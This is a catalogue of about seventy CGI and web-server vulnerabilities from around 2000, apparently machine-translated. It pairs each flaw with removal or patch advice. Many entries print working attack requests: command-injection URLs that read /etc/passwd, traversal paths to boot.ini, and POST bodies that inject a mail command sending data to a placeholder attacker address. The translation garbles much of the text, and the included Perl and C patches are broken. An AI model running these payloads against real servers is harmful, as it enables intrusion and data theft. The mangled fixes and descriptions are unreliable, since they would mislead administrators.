CGI security vulnerability data quick check

zhaozj2021-02-08  268

######################################################################################################################################################################################################################################################################################################## ###################### This article takes a friend. This is not a precious thing, if you usually pay attention to collected, I believe that many people will have more comprehensive and better information than this. But for some reason. These materials have been refused to be open. But I am a Little Guys that advocates completely free, completely open, completely shared. So I Open this information. I hope that the friend should not blame the crime :) # If there is any safety organization or individual is willing to have no long-term, uninterrupted maintenance, update or change to this article. Please casually, don't have to discuss with me But the requirement is that the results must be fully disclosed to the Internet. Any behavior of private hides are unwelcome. # This article welcomes the sum. But please keep these statements. # If there is any problem or suggestions, please mailto: iwillsurewin@163.net# iWillSurewin 2000.7.28 ############################## ######################################################################

1 Type: Attack Name: PHF Risk Level: In NCSA or Apache (1.1.1) There is a program Util.c in a non-commercial version of Web Server, allowing hackers to perform any instructions as root: http : //www.xxx.com/cgi-bin/phf? qname = root% 0AME% 20Command% 20HERE suggestion: Solution: Upgrade Apache Web Server to 1.1.1 or more to upgrade NCSA Web Server to the latest version

______________________________________________________

2 Type: Attack Name: WGUSET.EXE Risk Level: Document: If you use NT as your webserver's operating system, and WGuest.exe exists in your web executable directory, intruders will use it. Read all USR_ users can read on your hard disk Suggestions: WGUSET.EXE removes WGUSET.EXE from your web directory: remove WGUSET.EXE from your web directory or delete

________________________________________________________

3 Type: Attack Name: RGUSET.EXE Risk Level: Document: If you use NT as your webserver's operating system, RGUEST.EXE exists in your Web executable directory, intruders will use it. Read all USR_ users can read on your hard disk Suggestions: RGUSET.EXE removes RGUSET.EXE from your web directory: remove RGUSET.EXE from your web directory or delete

____________________________________________________________

4 Type: Attack Name: Perl.exe Risk Level: Low Description: Perl.exe exists in the CGI-BIN execution directory, which belongs to a severe configuration error. Hackers can add a string of instructions after Perl.exe, using the browser to execute any script programs on the Server: Perl.exe is unsafe solution in the web directory of any permission: In the Web Directory Remove the perl.exe program.

____________________________________________________________________5 Type: Attack Name: shtml.exe Risk Rating: Low Description: If you use Front Page as your WebServer, then the intruder can use IUSR_ Users and shtml.exe invade your machine, you do not do Hope suggestions: remove Shtml.exe from your web directory or delete solution: remove Shtml.exe from your web directory or delete

________________________________________________________

6 Type: Attack Name: Wwwboard.pl Risk Level: Low Description: Wwwboard.pl Program Easy to cause an attacker to perform DOS attack recommendations for the server: If there is no need to delete the file workaround: below the subroutine of Get_variables section: if ($ FORM { 'followup'}) {$ followup = "1"; @ followup_num = split (/, /, $ FORM { 'followup'}); $ num_followups = @followups = @followup_num; $ last_message = POP (@followups); $ Origdate = "$ form {'ortdate'}"; $ iggname = "$ form {'origname'}"; $ Origsubject = "$ form {'Origsubject'}";} Replacement To: if ($ FORM { 'followup'}) {$ followup = "1"; @ followup_num = split (/, /, $ FORM { 'followup'}); $ num_followups = @followups = @followup_num; $ last_message = pop (@ Followups); $ Origdate = "$ form {'or or or or or}} =" $ form {' origname '} "; $ Origsubject =" $ form {' Origsubject '} "; # wwwboard bomb patch # Written by: Samuel Sparling Sparling@slip.net) $ fn = 0; while ($ fn <$ number_followups) {$ cur_fup = @followups $ fn]; $ dfn = 0; Foreach $ fm (@followups) {f (@followups [$ DFN] == @followups [$ fn] && $ dfn! = $ fn) {& error (board_bomb);} $ DFN ;} $ fn ;} # end wwwboard bomb patch}

Related connection: http: // hgfr

_________________________________________________________________________7 Type: Attack Name: uploader.exe risk level: Medium Description: If you are using NT as the operating system of your WebServer, intruders can use uploader.exe upload any files Recommendation: uploader.exe removed from your Web directory Walk or delete a solution: remove UPLoader.exe from your web directory or delete

_____________________________________________________

8 Type: Attack Name: BDIR.HTR Risk Level: High Description: If you use NT as your webserver's operating system, and BDIR.htr exists in your web executable directory, intruders will use it. Create an ODBC database on your server and generate some executable files. Suggestion: Remove BDIR.htr from your web directory or delete solution: remove BDIR.htr from your web directory or delete

_________________________________________________________

9 Type: Attack Name: Count.cgi Risk Level: High Description: The count.cgi program under / cgi-bin directory (wwwcount2.3 version) has an overflow error, allowing intruders to remotely perform any instructions remotely. Recommendation: If there is no need to delete this file workaround: upgrade wwwcount to 2.4 or more

______________________________________________________

Type 10: Attack Name: Test-CGI Risk Level: High Description: Test-CGI This file can be used by intruders to browse important information on the server

Recommendation: It is recommended to review the execution program in the CGI-bin directory, strictly control access to access: Delete TEST-CGI files

_________________________________________________________

11 Type: Attack Name: NPH-TEST-CGI Risk Level: High Description: NPH-TEST-CGI This file can be used by intruders to browse important information on the server

Recommendation: It is recommended to review the execution program in the CGI-bin directory, strictly control access to access: Delete NPH-TEST-CGI files

_________________________________________________________

12 Type: Attack Name: PHP.cgi Risk Level: Low Description: PHP.CGI program has more vulnerabilities, including cache overflow vulnerabilities, and the vulnerability suggestions that can be read by any system files can be read by invaders: Recommendation CGI -bin directory, avoid unnecessary programs have a solution: deleting a php.cgi program is the best way

______________________________________________________

13 Type: Attack Name: Handler Risk Level: Low Description: Irix 5.3, 6.2, 6.3, 6.4 / CGI-BIN / HANDLER program There is a cache overflow error, allowing invaders to remotely execute a program remotely on Server: telnet target.machine .com 80GET / cgi-bin / handler / whatever; cat / etc / passwd | data = DownloadHTTP / 1.0 recommendation:? audit recommendations cgi-bin directory, to avoid unnecessary procedures exist workaround: delete the file handler ________________________________________________________________

14 Type: Attack Name: WebGais Risk Level: High Description: / CGI-BIN, Directory WebGais is an interface of the GAIS search tool, which has a problem that enables intruders to bypass the security mechanism of the program, execute system commands: POST / CGI-BIN / WebGais HTTP / 1.0content-Length: 85 (Replace this with the actual length of the "Exploit" line) telnet target.machine.com 80

Query = '; mail you/@your.host

_____________________________________________________

15 Type: Attack Name: Websendmail Risk Level: High Description: / cgin-bin directory Websendmail program allows intruders to execute a system directive:

telnet target.machine.com 80POST / cgi-bin / websendmail HTTP / 1.0Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx = 90) receiver =; mail your_address /@somewhere.org

________________________________________________________________________________________

16 Type: Attack Name: WebDist.cgi Risk Level: High Description: For IRIX6.2 and 6.3 platforms, WebDist.cgi under / cgi-bin directory has a weak point to allow intruders to perform any instructions on the system without logging in: http://host/cgi-bin/webdist.cgi? distloc =; CAT% 20 / etc / passwd

Recommendation: It is recommended to review the cgi-bin directory to avoid unnecessary programs existing solution: delete /va/www/cgi-bin/webdist.cgi ________________________________________________________________________________________________________________________________________________________________________________________________________________

17 Type: Attack Name: FaxSurvey Risk Level: High Description: The FaxSurvey program under Linux Suse / cgi-bin directory allows intruders to execute instructions on the server without being logged in: http: //joepc.linux.elsewhere.org / cgi-bin / faxsurvey? / bin / cat% 20 / etc / passwd suggestion: It is recommended to review the CGI-bin directory to avoid unnecessary programs exist solution: delete / cgi-bin / faxsurvey file

____________________________________________________________

18 Type: Attack Name: HTMLScript Risk Level: Document: Installing HTMLScript2.99x or earlier server, there is a problem that enables intruders to view any files on the server: http://www.vulnerable.server. COM / CGI-BIN / HTMLScript? ../../../../ etc / passwd suggestion: Review the CGI-bin directory to avoid unnecessary programs: delete / cgi-bin / htmlscript script Document, or upgrade HTMLScript to 3.0 or more

______________________________________________________________

19 Type: Attack Name: PfDisplay Risk Level: Description: On Irix6.4 or earlier version of the web server, / cgi-bin / pfdisplay program allows invaders to illegally view file recommendations on the server: Recommendation CGI-Bin Directory, avoid unnecessary programs have a solution: delete / cgi-bin / pfdisplay file, or patch dock patch can go to Sgigate.sgi.com (204.94.209.1) or filename: readme.patch .3018algorithm # 1 (sum -r): 37955 11 readme.patch.3018algorithm # 2 (sum): 15455 11 readme.patch.3018md5 Checksum: 1169eb51d75e0794c64c2c1fd6211b69

Filename: patsg0003018algorithm # 1 (sum -r): 01679 2 Patchsg0003018algorithm # 2 (SUM): 12876 2 Patchsg0003018MD5 Checksum: BD16A53AE693D6E9E276EE066BDBC8

Filename: patchsg0003018.idbalgorithm # 1 (sum -r): 01339 2 Patchsg0003018.idbalgorithm # 2 (sum): 251 2 Patchsg0003018.idbmd5 Checksum: 1CB16E6A8C50BF17CD02A29C2E4D35EB

Filename: patchSG0003018.performer_tools_manAlgorithm # 1 (sum -r): 10201 8 patchSG0003018.performer_tools_manAlgorithm # 2 (sum): 3144 8 patchSG0003018.performer_tools_manMD5 checksum: B6B3D90FAB9B5A342397C3E5AF5A8D29Filename: patchSG0003018.performer_tools_swAlgorithm # 1 (sum -r): 48474 18 patchSG0003018.performer_tools_swAlgorithm # 2 (SUM): 28176 18 PatchSG0003018.Performer_Tools_SWMD5 Checksum: DF4E8ED8326A6A0B39F7B4D67E5FD71F Related Connections: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64

___________________________________________________________________________________________

20 Type: Attack Name: WWW-SQL Risk Level: WWW-SQL is stored in / cgi-bin / directory, which will cause intrusion to access the protected file recommendation: It is best to delete WWW-SQL file resolution Method: #IF phpfastcgi while (fcgi_accept ()> = 0) {#ndifs = getenv ("redirect_status"); if (! S) {PUTS ("Content-Type: Text / Plain / R / N / R / NPHP / Fi Detected An Internal Error. Please inform sa@hogia.net of what you just did./n" ";exit(1);} s = getenv ("path_translated"); related connection:

________________________________________________________________________________________________________________________________________________________________________________________________________________________________

21 Type: Attack Name: View-Source Risk Level: High Description: The View-Source program under the CGI-BIN directory does not check the input, so that the intruder can view any files on the server: Recommendation CGI- BIN directory, avoid unnecessary programs existing solution: Delete the ViewSource program related to / cgi-bin directory: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64

___________________________________________________________

22 Type: Attack Name: CAMPAS Risk Level: High Description: The campas program under the cgi-bin directory has an important file that enables intruders to view Server: telnet www.xxxx.net 80trying 200.xx.xx .xx ... connection to venus.xxxx.netescape character is '^]'. get / cgi-bin / campas?% 0act% 0A / etc / passwd% 0A suggestion: It is recommended to review the CGI-bin directory to avoid unnecessary solutions exist program: campas procedures under the relevant connection delete / cgi-bin directory: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64___________________________________________________________________________

23 Type: Attack Name: AGLIMPSE Risk Level: High Description: Aglimpse programs under the CGI-bin directory There is a problem that can make any instructions for intruders without logging in: It is recommended to review the cgi-bin directory to avoid unnecessary Program existence solution: Delete the AGLIMPSE program related to / cgi-bin directory: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64

__________________________________________________________

Type 24: At-Admin. AT-Admin .cgi Risk Level: In the /ci-bin/at-admin.cgi program on Excite for Web Servers 1.1, allowing ordinary users to fully control the entire system recommendation: Recommendation CGI -bin directory, avoid unnecessary programs have a solution: delete the AT-Admin .cgi program related to / cgi-bin directory: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid = 64

_________________________________________________________________

25 Type: Attack Name: Finger Risk Level: Description: This finger program under / cgi-bin can view information about other servers, but if you change the parameters, the account information on this machine will expose : / cgi-bin / finger? @localhost suggestion: It is recommended to review the cgi-bin directory to avoid unnecessary programs exist: delete the Finger program related to the / cgi-bin directory:

_________________________________________________________________

26 Type: Attack Name: WebWho.pl Risk Level: Document: If there is a webwho.pl of the CGI script in your web executable directory, the intruder will be able to read and write the user to read the Web. Any file. Recommendation: Remove WebWHO.PL from your web directory: Remove WebWho.pl from your web directory _____________________________________________________________________________________________________________________________________________________________________________________________________________________________________________

27 Type: Attack Name: W3-MSQL Risk Level: Low Description: One CGI (W3-MSQL) included with the MINISQL package release can be used to perform any code with HTTPD UID permissions. This security vulnerability is caused by the scanf () function in the program. Recommendation: If you have installed the Minisql package, please delete or remove the W3-MSQL file under the / cgi-bin / directory Solution: If you have a minisql package, please / cgi-bin / directory The W3-MSQL file is deleted or removed. Or use the following patches.

patch:

------ w3-msql.patch ---------

410C410 scanf ("% 128s", boundary; 418c418 Strncat (var, buffer, sizeof (buffer) 428c428 Scanf ("Content-Type: 15360S", Buffer;

------ w3-msql.patch ---------

________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________

28 Type: Attack Name: Netscape FastTrack Server 2.0.1A Risk Level: UnixWare 7.1 The Netscape FastTrack Server 2.0.1a included with a remote buffer overflow vulnerability. By default, the HTTPD of the 457 port provides UNIXWARE documentation through the HTTP protocol. If a length of a length of more than 367 characters is transmitted to the server, the buffer overflows, and the EIP value is overwritten will result in any code to be executed at HTTPD permissions. Recommendation: Temporary solution is to close the Netscape FastTrack server solution: Temporary solution is to close the Netscape FastTrack server.

_________________________________________________________________

29 Type: Anyform.cgi Risk Level: High Description: The AnyForm.cgi program in the CGI-bin directory is used for simple forms passing through the mail, but the program is not thorough, Used by intruders, perform any instructions on Server. Recommendation: Review the CGI-bin directory to avoid unnecessary programs: It is recommended to upgrade the CGI program, or delete the file-related connection: http: // www. securityfocus.com/vdb/bottom.html?section=exploit&vid=719___________________________________________________________________________________________

30 Type: Attack Name: WHOIS.CGI Risk Level: Low Description: There is a spilled vulnerability in WHOIS.cgi in multiple webserver. They include: WHOIS INTERNIC LOOKUP - VERSION: 1.02cc Whois - Version: 1.0matt's Whois - Version: 1 They will enable intruders to perform any code suggestions for permissions to start HTTPD users on your system: Will you web directory QHOIS.cgi delete or remove the solution: Will ask whyis.cgi to delete or remove in your web directory

_________________________________________________________________________________31 Type: Attack Name: environ.cgi risk level: Medium Description: /cgi-bin/environ.cgi program Apache web server or IIS and other web server, there is a fault to allow an intruder to bypass security mechanisms, browse the server Some documents: It is recommended to review the CGI-bin directory to avoid unnecessary programs: It is recommended to upgrade the CGI program, or delete the file-related connection:

________________________________________________________________

32 Type: Attack Name: WRAP Risk Level: Description: / CGI-BIN / WRAP program has two vulnerabilities, all allow invaders to obtain illegal access to files on the server, such as http: // host / cgi-bin / Wrap? /../../../../../ etc Proposity: It is recommended to review the cgi-bin directory to avoid unnecessary programs existing solution: Delete / CGI-BIN / WRAP file related connection: http : //phoebe.cps.unizar.es/~spd/pub/ls.cgi

__________________________________________________________________________________________________________________

33 Type: Attack Name: Edit.pl Risk Level: /cgi-bin/edit.pl has a security weakness, use the following command to access the user's configuration: http://www.siteTracker. COM / CGI-BIN / Edit.pl? Account = & password = suggestion: It is recommended to review the CGI-bin directory to avoid unnecessary programs exist: delete /ci-bin/edit.pl file related connections: http: // Phoebe.cps.unizar.es/~spd/pub/ls.cgi_______________________________________________________________________________________________________________________________________________________________________________________________________________________________

34 Type: Attack Name: Service.PWD Risk Level: Document: UNIX System http://www.hostname.com/_vti_pvt/service.pwd Read, will expose user password information

Recommendation: Recommendation to delete the solution: Chown root service.pwdchmod 700 service.pwd related connections:

___________________________________________________________________________35 Type: Attack Name: administrators.pwd risk level: Medium Description: http://www.hostname.com/_vti_pvt/administrators.pwd UNix system readable, will expose the user password information

Recommendation: Recommendation Delete Solution: Chown root administrators.pwdchmod 700 Administrators.pwd related connections:

____________________________________________________________

36 Type: Attack Name: Users.PWD Risk Level: Document: UNIX System Http://www.hostname.com/_vti_pvt/Users.pwd Readable, will expose user password information

Recommendation: Recommendation Delete Solution: Chown root users.pwdchmod 700 users.pwd related connection: ______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________

37 Type: Attack Name: Authors.PWD Risk Level: Document: UNIX System Http://www.hostname.com/_vti_pvt/authors.pwd Readable, will expose user password information

Recommendation: Recommendation Delete Solution: Chown root authors.pwdchmod 700 authors.pwd related connections:

__________________________________________________________

38 Type: Attack Name: Visadmin.exe Risk Level: In the cgi-bin directory of Omnihttpd Web Server, the attacker will enter the following command: http://omni.server/ ? cgi-bin / visadmin.exe user = guest a few minutes after the server's hard disk will be full recommendation: delete the solution: delete the relevant connection from the visadmin.exe cgi-bin directory: ________________________________________________________________________________

39 Type: Attack Name: Get32.exe Risk Level: High Description: Alibaba's Web Server, its CGI-bin directory exists with Get32.exe, allowing invaders to perform one instruction: http://www.victim.com /ci-bin/get32.exe|echo:/commmand.com suggestion: Recommendation to delete the solution: Remove Get32.exe from the CGI-BIN directory:

_________________________________________________________________

40 Type: Attack Name: Alibaba.pl Risk Level: High Description: Alibaba's Web Server, its cgi-bin directory exists on Alibaba.pl, allows invaders to perform one instruction: http://www.victim.com /ci-bin/alibaba.pl|Dir suggestion: Recommendation to delete the solution: Remove Alibaba.pl from the CGI-BIN directory:

________________________________________________________________

41 Type: Attack Name: TST.BAT Risk Level: High Description: Alibaba's Web Server, its CGI-bin directory exists with TST.BAT, allows invaders to perform one instruction: http://www.victim.com /cgi-bin/tst.bat|Type C:/Windows/win.ini suggestion: Recommendation to delete the solution: remove TST.BAT to remove related connections from the CGI-bin directory:

________________________________________________________________

42 Type: Attack Name: FpCount.exe Risk Level: Low Description: If you use NT as your Webserver's operating platform, only SP3 patches are installed, then intruders can use this CGI program to make DOS attacks, make your IIS Service Refused Access Suggestions: Will delete or remove the fpcount.exe in your web directory: Will delete or remove the fpcount.exe in your web directory

________________________________________________________________________________________________________________________________________________________________________________________________________________________________

43 Type: Attack Name: OpenFile.cfm Risk Level: Low Description: If you contain /cfdocs/expeval/exprcalc.cfdocs/cfdocs/expeval/sendmail/eval.cfdocs/expeval/eval.cfm/cfdocs /EXPEVAL/OpenFile.cfm/cfdocs/expeval/displaypendfile.cfm/cfdocs/exampleapp/email/getfile.cfm/cfdocs/exampleapp/publish/admin/addContent.cfm These files may be able to use them to read your system all files on the recommendation: openfile.cfm in your Web directory deleted or moved solution: openfile.cfm in your Web directory deleted or moved _______________________________________________________________________________________

44 Type: Attack Name: Exprcalc.cfm Risk Level: Low Description: If you contain /cfdocs/expeval/expeval/sendmail/cfm/cfdocs/sendmail/eval.cfdocs/ExpeVal/eval.cfm/cfDocs /ExpeVal/eval.cfm/cfdocs /EXPEVAL/OpenFile.cfm/cfdocs/expeval/displaypendfile.cfm/cfdocs/exampleapp/email/getfile.cfm/cfdocs/exampleapp/publish/admin/addContent.cfm These files may be able to use them to read your system All file recommendations: Will delete or remove the exprcalc.cfm in your web directory: Will delete or remove related connections in your Web directory: http://www.allaire.com/ HANDLERS / INDEX.CFM? ID = 8727 & method = FULL

__________________________________________________________

45 Type: Attack Name: Displaypendfile.cfm Risk Level: Low Description: If you contain /cfdocs/expeval/expeval/sendmail/cfdocs/cfdocs/expeval/eval.cfm/cfdocs/expeval/eval.cfm/CFDOCS in your web directory /EXPEVAL/OpenFile.cfm/cfdocs/expeval/displaypendfile.cfm/cfdocs/exampleapp/email/getfile.cfm/cfdocs/exampleapp/publish/admin/addContent.cfm These files may be able to use them to read your system All documents suggest: Delete or remove the DisplayOpenedFile.cfm in your web directory: Will delete or remove related connections in DisplayOpenedFile.cfm in your web directory: http://www.allaire.com/ HANDLERS / INDEX.CFM? ID = 8727 & method = FULL

____________________________________________________________

46 Type: Attack Name: Sendmail.cfm Risk Level: Description: Will delete or remove WHOIS.cgi with a plurality of Webserver in your web directory. There is a spill vulnerability. They include: WHOIS INTERNIC LOOKUP - VERSION:

1.02cc Whois - Version: 1.0matt's Whois - Version: 1 They will make intruders

Can perform any code on your system using the permission to start the HTTPD user

If your Web contains /cfdocs/expeval/exprcalc.cfm/cfdocs/expeval/sendmail.cfm/cfdocs/expeval/eval.cfm/cfdocs/expeval/openfile.cfm/cfdocs/expeval/displayopenedfile.cfm/cfdocs directory /exampleapp/email/getfile.cfm/cfdocs/exampleapp/publish/admin/addContent.cfm These files, then intruders may be able to use them to read all files on your system: Sendmail.cfm in your web directory Delete or remove Solution: Will delete or remove related connections in your web directory: http://www.allaire.com/handlers/index.cfm?id=8727&method=full

________________________________________________________________________________________________________________________________________________________________________________________________________________________________

47 Type: Attack Name: Codebrws.asp Risk Level: Document: If you use NT IIS as your webserver, the intruder can use this ASP to view all of your system All HTTPD users have permission reading files. Go to the following address query patch Internet information server: ftp: //ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/viewcode-fix/site server: ftp: //ftp.microsoft.com/bussys/ Sitesrv / sitessrv-public / fixes / usa / SITESERVER3 / HotFixes-Postsp2 / ViewCode-fix / http://www.microsoft.com/security/products/iis/checklist.asp suggestion: willbrws in your Web directory. ASP Delete or Remove Solution: Will delete or remove Codebrws.asp in your web directory

_________________________________________________________________

48 Type: Information Model: Codebrws.asp_1 Risk Level: In / iissample / ExAir / HowitWorks / Count below, with the following path: http://www.xxx.com/iissample/exair/ HowitWorks / Codebrws.asp? source = / index.asp can check the source code of INDEX.ASP. Actually any ASCII file can be browsed.

Recommendation: Deleting a Web Directory Solution: Will delete or remove the codebrws.asp in your web directory, please contact the following address querying the patch Internet information Server: ftp: //ftp.microsoft.com/bussys/ IIS / IIS-PUBLIC / FIXES / USA / ViewCode-fix / site server: ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usitsp2/viewcode-fixes-postsp2/viewcode-fix/HTTP2/ViewCode-fix : //www.microsoft.com/security/products/iis/checklist.asp Related Links: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/_________________________________________________________________________________49 type: Attack type: showcode.asp_1 Risk Level: In the / msads / Samples / Selector / Directory, there is a showcode.asp file, with the following path: http://www.xxx.com/msadc/samples/selector/ Showcode.asp? source = / msadc / samples /../..../../../ boot.ini can find the content of the Boot.ini file; actually invaders can use this ASP to view your system All the files that start HTTPD users have permission reading

Recommendation: Disable anonymous access to / msads directory: Will delete or remove Showcode.asp in your web directory, please contact the following address querying Internet information Server: ftp: //ftp.microsoft.com/bussys/iis /r / Iis-public / fixes / usa / viewcode-fix / site server: ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/siteserver3/HOTFIXES-POSTSP2/VIEWCODE-FIX/HTTP: //www.microsoft.com/security/products/iis/checklist.asp related connection: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/viewcode-fix/

________________________________________________________________________________________________________________________________________________________________________________________________________________________________

50 Type: Attack Name: / MSADC Directory Access Risk Level: Description: WindowsNT IIS Server can access, which can cause a series of security issues, including illegal call applications that were invaded: It is recommended to delete unnecessary Directory solution formed by IIS default installation: disable / msadc directory, if you must open this directory, at least set to legal users need password to access

_________________________________________________________________

51 Type: Attack Name: Search97.VTS Risk Level: Description: This file will enable invaders to read file suggestions to start HTTPD users in your system: Search97.vts in your web directory deleted or moved solution: search97.vts in your Web directory deleted or moved, or downloaded from the following address Patchhttps: //customers.verity.com/products/server/310/patches/_____________________________________________________________________________

52 Type: Attack Name: CARBO.DLL Risk Level: Low Description: If you have the SYSTEMS RUNNING ICAT Suite Version 3.0, it will automatically add a file called Carbo.dll on your system, and the invaders will be able to Use this file to access the hot and file recommendations on your system: Will delete or remove the OpenFile.cfm in your web directory: Will delete or remove the openfile.cfm in your web directory

______________________________________________________________

53 Type: Attack Name: WHOIS_RAW.CGI Risk Level: Low Description: Because the WHOIS_RAW.CGi Author's mistake, this CGI will enable intruders to execute any of your system any program recommendations on your system: Will delete or remove WHOIS_RAW.CGI in your web directory: Will delete or remove or remove WHOIS_RAW.CGI in your web directory

____________________________________________________________

54 Type: Attack Name: DOC Risk Level: Low Description: Your web directory can be file list, which will help invadeers analyze your system information: set all your web directory to unable file list Solution: Will you All web directory set to unable file list

____________________________________________________________

55 Type: Attack type: .html /............. / CONFIG.SYS Risk Level: Low Description: If you use a longer version of ICQ, then intruders can take advantage of it Read all the files on your machine: Download the new version of ICQ Solution: Please download the new version of ICQHttp://www.icq.com/download/

___________________________________________________________

56 Type: Attack Name: ... / Risk Level: Description: The WebServer software you use allows intruders to read all files on your system: Replace or upgrade your WebServer software solution: Replace or Upgrade your Web Server software

_____________________________________________________________

58 Type: NO-SUCH-FILE.PL Risk Level: Low Description: Since your WebServer software is defective, the intruder can use the non-existing CGI script request to analyze your site directory structure suggestions: upgrade Your WebServer software solution: Upgrade your webserver software ______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________

59 Type: Attack Name: _vti_bin / shtml.dll Risk Level: Low Description: Intruders use this file to make your system's CPU usage of 100% Suggest: _vti_bin / shtml.dll from your Web Directory Delete or remove Solution: Delete or remove the _vti_bin / shtml.dll from your web directory

___________________________________________________________

60 Type: Information type: NPH-Publish Risk Level: Description: There is a NPH-PUBLISH file in / cgi-bin directory, which enables intruders to adopt any file on the server: Recommendations / cgi-bin Directory, delete unnecessary CGI program workaround: Delete NPH-PUBLISH files

___________________________________________________________

61 Type: Information type: Showcode.asp Risk Level: Middle Description: In /msadc/samples/selector/showcode.asp?source=/msadc/samples/selector/ Directory The showcode.asp file can be used by invaders View the contents of the server on the server: It is best to disable / msadc this web directory anonymous access, it is recommended to delete this web directory solution: Delete showcode.asp files

_____________________________________________________________

62 Type: Information type: _vti_inf.html Risk Level: The _vti_inf.html file exists in the web root of the web, which is the feature of FrontPage Extens Server, which contains important information about FrontPage Extens Server; and FrontPage Extension server is a web service a lot of loopholes, the intruder may use it to directly modify the page file recommendations: upload page document solutions with other ways such as ftp: uninstall Frontpage Extention Server ________________________________________________________________________________

63 Type: Information Model: Index.asp :: $ DATA Risk Level: The source code of the ASP program can be checked by the suffix :: $ data, such intruders can try to find the server database password information

Recommendation: It is recommended to pay attention to Microsoft's latest patch and security bulletin solution: Install Services Pack6 or patch: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/chs/security/FESRC-FIX / Related Links: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/chs/security/fesrc-fix/___________________________________________________________________________________

64 Type: Attack Name: Main.asp% 81 Risk Level: Low Description: The source code of the ASP program can be viewed by the suffix % 81, so that invaders can try to find important information such as server database passwords.

Recommendation: It is recommended to pay attention to Microsoft's latest patch and security bulletin solution: Install Services Pack6 or patch: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/chs/security/FESRC-FIX / Related Connections: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/chs/security/FESRC-FIX/

____________________________________________________________________________________65 Type: Information type name: showcode.asp_2 risk level: Medium Description: There is showcode.asp files in / msadc / Samples / SELECTOR / directory, use the following path: http: //www.xxx.com/msadc/Samples /Selector/showcode.asp?source=/msadc/sample/../../../../../boot.ini can find the content of the boot.ini file; actually invaders can take this ASP View all the files that start HTTPD users on your system have permission reading

Recommendation: Disable anonymous access to / msadc directory: Will delete or remove showcode.asp in your web directory, please contact the following address querying Internet information server: ftp: //ftp.microsoft.com/bussys/iis / Iis-public / fixes / usa / viewcode-fix / site server: ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/siteserver3/HOTFIXES-POSTSP2/VIEWCODE-FIX/HTTP: //www.microsoft.com/security/products/iis/checklist.asp related connection: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/viewcode-fix/

_________________________________________________________________

66 Type: Attack Name: ISM.DLL Risk Level: High Description: There is an ism.dll file in / scripts / iisadmin / directory, which has an overflow error that allows invaders to perform any segment on the server; Attacks can always make the server's WWW service to die: disable anonymous access to / scripts directory: Delete / Scripts/iisadmin/ism.dll, or open IIS's management console, select the default web site, right click , select properties, click: "Home directory" in the start point of the line "configure" button, the ".htr" application mapping entries deleted ___________________________________________________________________________________________

67 Type: Information Model: Codebrws.asp_2 Risk Level: In / iissample / SDK / ASP / DOCS / below the Codebrws.asp file, with the following path: http://www.xxx.com/iissample/ EXAIR / HOWITWORKS / CODEBRWS.ASP? Source = / index.asp can check the source code of INDEX.ASP. Actually any ASCII file can be browsed.

Recommendation: Deleting a Web Directory Solution: Will delete or remove the codebrws.asp in your web directory, please contact the following address querying the patch Internet information Server: ftp: //ftp.microsoft.com/bussys/ IIS / IIS-PUBLIC / FIXES / USA / ViewCode-fix / site server: ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usitsp2/viewcode-fixes-postsp2/viewcode-fix/HTTP2/ViewCode-fix : //www.microsoft.com/security/products/iis/checklist.asp Related Connections: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/viewcode-fix/

_________________________________________________________________

68 Type: Attack Name: UploadN.asp Risk Level: High Description: There is an UPLOADN.ASP program in the / scripts / Tools directory, as long as the intruder has an available account, even if the guest account, you can upload any files to you. Web directory, in addition to replacing the home page, he can further control your entire system! Recommendation: Deleting a web directory solution called / scripts: Delete UPLOADN.ASP file related connections:

_________________________________________________________________

69 Type: Attack Name: Uploadx.asp Risk Level: High Description: There is an UPLOADX.ASP program in the / scripts / Tools directory, as long as the intruder has an available account, even if it is a guest account, you can upload any files to you. web directory, in addition to replacing the home page, the more he can further control your entire system suggestions:! delete called / scripts web directory Workaround: delete the file uploadx.asp Related Links: ______________________________________________________________________________________

70 Type: Attack Name: Query.asp Risk Level: Low Description: There is a query.asp file in the / iissamples / exair / search / directory. This file has a vulnerability. If the attacker is used, the consequences will result in CPU usage More than 100%, machine speed will be significantly slowed down: Prohibit Access Solution to / Iissamples Directory: Delete Query.asp files

____________________________________________________________

71 Type: Attack Name: AdvSearch.asp Risk Level: Low Description: There is a query.asp file in the / iissample / exair / search / directory. This file has a vulnerability if the attacker is used, which will result in CPU usage To reach 100%, the machine speed will be significantly slowed down: prohibit access to / iissample directory: Delete AdvSearch.asp files

____________________________________________________________

72 Type: Attack Name: Search.asp Risk Level: Low Description: There is a search.asp file in the / iissample / exair / search / directory. This file has a vulnerability. If the attacker is used, the consequence will result in CPU usage. To reach 100%, machine speed will slow down: Prohibit Access Solution to / Iissamples Directory: Delete Search.asp files

________________________________________________________________________________________________________________________________________________________________________________________________________________________________

74 Type: Attack Name: Getdrvrs.exe Risk Level: This Description: This getDrvrs.exe file in / scripts / Tools directory allows any user to create any files in the web root directory, and create an ODBC data source suggestion: Prohibit Anonymous Access Solution to / Scripts / Tools Directory: Delete getDrvrs.exe files

____________________________________________________________

